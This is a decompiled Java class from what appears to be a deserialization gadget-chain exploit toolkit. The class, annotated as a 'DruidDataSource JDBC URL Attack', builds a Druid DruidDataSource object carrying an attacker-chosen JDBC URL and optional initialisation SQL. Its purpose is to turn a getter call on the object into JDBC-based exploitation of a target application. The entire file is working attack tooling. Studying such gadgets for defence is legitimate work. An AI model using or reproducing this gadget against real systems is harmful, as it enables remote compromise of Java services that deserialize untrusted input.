/*
 * Decompiled with CFR 0.152.
 */
package com.ar3h.chains.gadget.impl.javanative.datasource.druid;

import com.alibaba.druid.pool.DruidDataSource;
import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.util.Reflections;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import javax.sql.DataSource;

@GadgetTags(tags={"DataSourceChains", "Getter", "NotForJavaSerializable", "END"}, nextTags={"JdbcUrlChains", "JdbcUrlWithSQLChains"})
@GadgetAnnotation(name="DruidDataSource JDBC URL Attack", description="getter \u89e6\u53d1\u6b64\u94fe\uff0c\u901a\u8fc7 com.alibaba.druid.pool.DruidDataSource \u7c7b\uff0c\u8f6c\u4e3a jdbc url\u76f8\u5173\u5229\u7528", dependencies={"com.alibaba:druid:1.2.16"})
public class DruidDataSource2
implements Gadget {
    private final String getterMethodName = "getConnection";
    private final String getterPropertyName = "connection";

    public Object getObject(String jdbcUrl, List<String> sqlList) throws Exception {
        DruidDataSource dataSource = new DruidDataSource();
        dataSource.setLogWriter(null);
        dataSource.setStatLogger(null);
        dataSource.setUrl(jdbcUrl);
        dataSource.setInitialSize(1);
        Reflections.setFieldValue(dataSource, "transactionHistogram", null);
        Reflections.setFieldValue(dataSource, "statLogger", null);
        Reflections.setFieldValue(dataSource, "initedLatch", null);
        if (sqlList != null) {
            Reflections.setFieldValue(dataSource, "connectionInitSqls", sqlList);
        }
        return dataSource;
    }

    @Override
    public Object invoke(GadgetContext context, GadgetChain chain) throws Exception {
        Object jdbcObj = chain.doCreate(context);
        context.put(ContextTag.SUPER_CLASS_NAME_KEY, DataSource.class);
        context.put(ContextTag.SPECIAL_METHOD_NAME_KEY, "getConnection");
        context.put(ContextTag.GETTER_PARAM_NAME_KEY, "connection");
        String jdbcUrl = "";
        List<String> sqlList = new ArrayList<String>();
        if (jdbcObj instanceof String) {
            jdbcUrl = (String)jdbcObj;
        } else if (jdbcObj instanceof Map) {
            Map jdbcMap = (Map)jdbcObj;
            jdbcUrl = (String)jdbcMap.get(ContextTag.JDBC_URL);
            sqlList = (List)jdbcMap.get(ContextTag.JDBC_URL_SQL_LIST);
        }
        return this.getObject(jdbcUrl, sqlList);
    }
}

